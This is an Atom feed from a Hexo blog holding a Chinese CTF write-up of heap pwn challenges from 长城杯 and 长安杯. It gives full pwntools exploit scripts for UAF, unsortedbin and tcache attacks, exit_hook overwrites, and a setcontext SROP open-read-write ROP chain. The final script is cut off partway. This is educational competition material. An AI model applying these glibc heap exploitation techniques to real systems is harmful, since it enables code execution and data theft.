-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
201 lines (115 loc) · 196 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title></title>
<link href="https://brooke-hub.github.io/atom.xml" rel="self"/>
<link href="https://brooke-hub.github.io/"/>
<updated>2021-09-27T04:20:57.098Z</updated>
<id>https://brooke-hub.github.io/</id>
<author>
<name>WendyJellyBeans</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>近期比赛复现</title>
<link href="https://brooke-hub.github.io/2021/09/26/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/"/>
<id>https://brooke-hub.github.io/2021/09/26/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/</id>
<published>2021-09-26T03:31:16.000Z</published>
<updated>2021-09-27T04:20:57.098Z</updated>
<content type="html"><![CDATA[<blockquote><p>放假一直在划水,最近几次比赛题目都挺常规的,借此把堆栈题解题技巧复习一遍</p></blockquote><span id="more"></span><h1 id="长城杯"><a href="#长城杯" class="headerlink" title="长城杯"></a>长城杯</h1><h2 id="K1ng-in-h3Ap-I"><a href="#K1ng-in-h3Ap-I" class="headerlink" title="K1ng_in_h3Ap_I"></a>K1ng_in_h3Ap_I</h2><p>给了低位3字节,有UAF和off by null,尝试不泄露完整libc直接改hook</p><p>只用uaf就够了</p><p>malloc_hook和free_hook上都没有地址,exit_hook上有libc地址</p><p>那就尝试fastbin打exit_hook为og</p><p>但是fastbin attack会检查chunk size</p><p>看了下exit_hook前面都没有可用的数据,只能用unsortedbin attack写一个大数字(main_arena地址)作为fake chunk size</p><p>改好后让程序执行到exit(0)就可以触发og</p><p><img src="/2021/09/26/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/image-20210926152513300.png" alt="image-20210926152513300"></p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p &_rtld_global._dl_rtld_lock_recursive</span><br><span class="line"><span class="variable">$4</span> = (void (**)(void *)) <span class="number">0</span>x7f83ffbf7f48 <_rtld_global+<span class="number">3848</span>></span><br><span class="line"></span><br><span class="line">pwndbg> x/<span class="number">10</span>a <span class="number">0</span>x7f83ffbf7f48</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f48 <_rtld_global+<span class="number">3848</span>>:<span class="number">0</span>x7f83ff9d1c90 <rtld_lock_default_lock_recursive><span class="number">0</span>x7f83ff9d1ca0 <rtld_lock_default_unlock_recursive></span><br><span class="line"><span class="number">0</span>x7f83ffbf7f58 <_rtld_global+<span class="number">3864</span>>:<span class="number">0</span>x7f83ff9e50e0 <__GI__dl_make_stack_executable><span class="number">0</span>x6</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f68 <_rtld_global+<span class="number">3880</span>>:<span class="number">0</span>x1<span class="number">0</span>x7f83ffbf5928</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f78 <_rtld_global+<span class="number">3896</span>>:<span class="number">0</span>x1<span class="number">0</span>x1000</span><br><span class="line"><span class="number">0</span>x7f83ffbf7f88 <_rtld_global+<span class="number">3912</span>>:<span class="number">0</span>x78<span class="number">0</span>x40</span><br></pre></td></tr></table></figure><p>之前想着怎么把fd上有unsortedbin地址的chunk放入fastbin,还用off by null整了个堆合并(我真是好喜欢堆合并</p><p>结果释放到fastbin后大小不匹配了</p><p>直接从unsorted chunk切割一块大小匹配的chunk,直接UAF改fast chunk的fd地址末位,链入fastbin就好了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"></span><br><span class="line">libc=ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">">>"</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'index:'</span>,<span class="built_in">str</span>(index)) <span class="comment">#0-10</span></span><br><span class="line"> sla(<span class="string">'input size:'</span>,<span class="built_in">str</span>(size)) <span class="comment"># <=0xf0</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sa(<span class="string">'input context:'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gift</span>():</span></span><br><span class="line"> menu(<span class="number">666</span>)</span><br><span class="line"></span><br><span class="line">gift()</span><br><span class="line">sh.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line">exit_hook = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>) + <span class="number">0x59b738</span> <span class="comment">#exit_hook</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x88</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x68</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x88</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x90</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x90</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x60</span>) <span class="comment"># trim from unsortedbin</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># link chunk5 to tcache</span></span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">dele(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">2</span>,<span class="string">'\x00'</span>+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># #unsortedbin attack write a big num to be fake chunk size</span></span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x80</span>) <span class="comment">#clear unsortedbin</span></span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line">target=exit_hook-<span class="number">0x30</span></span><br><span class="line">edit(<span class="number">4</span>,p64(<span class="number">0</span>)+p8(target&<span class="number">0xff</span>)+p8((target&<span class="number">0xffff</span>) >> <span class="number">8</span>)+p8((target&<span class="number">0xffffff</span>) >> <span class="number">16</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x90</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment"># tcache attack </span></span><br><span class="line">target=exit_hook-<span class="number">0x23</span></span><br><span class="line">edit(<span class="number">5</span>,p8(target&<span class="number">0xff</span>)+p8((target&<span class="number">0xffff</span>) >> <span class="number">8</span>)+p8((target&<span class="number">0xffffff</span>) >> <span class="number">16</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">leak(<span class="string">'exit_hook'</span>,exit_hook)</span><br><span class="line">one=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"><span class="comment"># system = exit_hook - 0x5abba8</span></span><br><span class="line"><span class="comment"># leak('system',system)</span></span><br><span class="line">leak(<span class="string">'one'</span>,one[<span class="number">3</span>])</span><br><span class="line">target=exit_hook - <span class="number">0x4ffd01</span></span><br><span class="line">edit(<span class="number">8</span>,<span class="string">'\x00'</span>*<span class="number">0x13</span>+p8(target&<span class="number">0xff</span>)+p8((target&<span class="number">0xffff</span>) >> <span class="number">8</span>)+p8((target&<span class="number">0xffffff</span>) >> <span class="number">16</span>)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">menu(<span class="number">1</span>)</span><br><span class="line">sla(<span class="string">'index:'</span>,<span class="built_in">str</span>(<span class="number">11</span>)) <span class="comment">#0-10</span></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="K1ng-in-h3Ap-II"><a href="#K1ng-in-h3Ap-II" class="headerlink" title="K1ng_in_h3Ap_II"></a>K1ng_in_h3Ap_II</h1><p>uaf任意地址写</p><p>srop+orw_rop</p><p>有size限制我就把write改成了puts,调试时看到flag内容是已经被读入内存了,但是最后好像把地址输出出来了,应该是puts的参数有点问题,明天再看看吧,好饿啊想去吃饭了</p><p>我回来了,又看了一下,puts参数是没问题的,之前图省事儿把“flag\x00”字符串的存放地址和flag文件内容的存放地址用了同一个,分开存放就好了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="comment"># context.log_level='debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"></span><br><span class="line">libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">">>"</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,size</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'index:'</span>,<span class="built_in">str</span>(index)) <span class="comment">#0-15</span></span><br><span class="line"> sla(<span class="string">'input size:'</span>,<span class="built_in">str</span>(size)) <span class="comment"># <=0x60</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sa(<span class="string">'input context:'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> menu(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'input index:'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x50</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x50</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x30</span>)</span><br><span class="line"><span class="comment"># add(6,0x30)</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">tcache_head = u64(ru(<span class="string">'\x55'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0xf30</span></span><br><span class="line">leak(<span class="string">'tcache_head'</span>,tcache_head)</span><br><span class="line"></span><br><span class="line">sla(<span class="string">">>"</span>,<span class="string">'1'</span>*<span class="number">0x420</span>)</span><br><span class="line">target=tcache_head+<span class="number">0x750</span></span><br><span class="line">leak(<span class="string">'target'</span>,target)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">1</span>,p64(target+<span class="number">0x10</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x50</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x50</span>)</span><br><span class="line">show(<span class="number">3</span>)</span><br><span class="line">libc_base = u64(ru(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) -<span class="number">0x3ebcb0</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">__free_hook = libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">setcontext_35=libc_base+libc.sym[<span class="string">'setcontext'</span>] + <span class="number">0x35</span></span><br><span class="line"><span class="comment"># mov rsp, [rdi+0A0h]</span></span><br><span class="line"><span class="comment"># ......</span></span><br><span class="line"><span class="comment"># mov rcx, [rdi+0A8h]</span></span><br><span class="line"><span class="comment"># push rcx</span></span><br><span class="line"><span class="comment"># ......</span></span><br><span class="line"><span class="comment"># retn</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line">edit(<span class="number">5</span>,p64(__free_hook)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x30</span>)</span><br><span class="line"><span class="comment"># edit(7,p64(setcontext_35)+'\n')</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#=====================================================write orw_rop </span></span><br><span class="line">add(<span class="number">8</span>,<span class="number">0x60</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x30</span>)</span><br><span class="line"><span class="comment"># add(0,0x10)</span></span><br><span class="line"><span class="comment"># edit(0,'clag'.ljust(8,'\x00'))</span></span><br><span class="line"><span class="comment"># flag_addr= tcache_head +0x870</span></span><br><span class="line"></span><br><span class="line">pop_rdi=libc_base+<span class="number">0x00000000000215bf</span></span><br><span class="line">pop_rsi=libc_base+<span class="number">0x0000000000023eea</span></span><br><span class="line">pop_rdx=libc_base+<span class="number">0x0000000000001b96</span></span><br><span class="line">flag_addr=tcache_head+<span class="number">0x780</span> <span class="comment"># orw 1</span></span><br><span class="line">orw_addr = tcache_head+<span class="number">0x780</span></span><br><span class="line">orw_rop=<span class="string">'flag'</span>.ljust(<span class="number">0x10</span>,<span class="string">'\x00'</span>)</span><br><span class="line">orw_rop += p64(pop_rdi) + p64(flag_addr)</span><br><span class="line">orw_rop += p64(pop_rsi) + p64(<span class="number">0</span>)</span><br><span class="line">orw_rop += p64(libc_base+libc.sym[<span class="string">'open'</span>])</span><br><span class="line">orw_rop += p64(pop_rdi) + p64(<span class="number">3</span>)</span><br><span class="line">orw_rop += p64(pop_rsi) + p64(tcache_head+<span class="number">0x440</span>)</span><br><span class="line">orw_rop += p64(pop_rdx) + p64(<span class="number">0x50</span>)</span><br><span class="line"></span><br><span class="line">orw_rop += p64(libc_base+libc.sym[<span class="string">'read'</span>])</span><br><span class="line">orw_rop += p64(pop_rdi) + p64(tcache_head+<span class="number">0x440</span>)</span><br><span class="line">orw_rop += p64(libc_base+libc.sym[<span class="string">'puts'</span>])</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">len</span>(orw_rop)</span><br><span class="line">edit(<span class="number">8</span>,orw_rop[:<span class="number">0x60</span>])</span><br><span class="line">orw_last = tcache_head+<span class="number">0x7e0</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">9</span>)</span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line">edit(<span class="number">10</span>,p64(orw_last)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x30</span>)</span><br><span class="line">edit(<span class="number">9</span>,orw_rop[<span class="number">0x60</span>:])</span><br><span class="line"><span class="comment">#===============================================================</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#==================================set rdi</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x40</span>)<span class="comment">#clear</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x40</span>)<span class="comment">#rdi</span></span><br><span class="line">edit(<span class="number">0</span>,<span class="string">'\x00'</span>*<span class="number">0x40</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x40</span>)<span class="comment">#rdi+0x50</span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">'\x00'</span>*<span class="number">0x40</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x40</span>)<span class="comment">#rdi+0xa0 </span></span><br><span class="line">edit(<span class="number">1</span>,<span class="string">'\x00'</span>*<span class="number">0x40</span>)</span><br><span class="line"></span><br><span class="line">chunk1=tcache_head + <span class="number">0x1190</span></span><br><span class="line">edit(<span class="number">0</span>,p64(chunk1)+<span class="string">'\n'</span>)</span><br><span class="line">retn=libc_base+<span class="number">0x00000000000008aa</span></span><br><span class="line">edit(<span class="number">1</span>,p64(orw_addr+<span class="number">0x10</span>)+p64(retn)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =================================__free_hook to gadget</span></span><br><span class="line">edit(<span class="number">7</span>,p64(setcontext_35)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ==================================triger</span></span><br><span class="line">leak(<span class="string">'setcontext_35'</span>,setcontext_35)</span><br><span class="line">leak(<span class="string">'orw_addr'</span>,orw_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="长安杯"><a href="#长安杯" class="headerlink" title="长安杯"></a>长安杯</h1><h2 id="baigei"><a href="#baigei" class="headerlink" title="baigei"></a>baigei</h2><p>add处的size是有符号int,可以输入-1存入sz_list,在edit处比较被强转为无符号数,从而任意字节溢出</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'node4.buuoj.cn'</span>, <span class="number">25603</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./main"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># libc=ELF('libc.so.6')</span></span><br><span class="line">libc=ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">elf=ELF(<span class="string">'./main'</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span 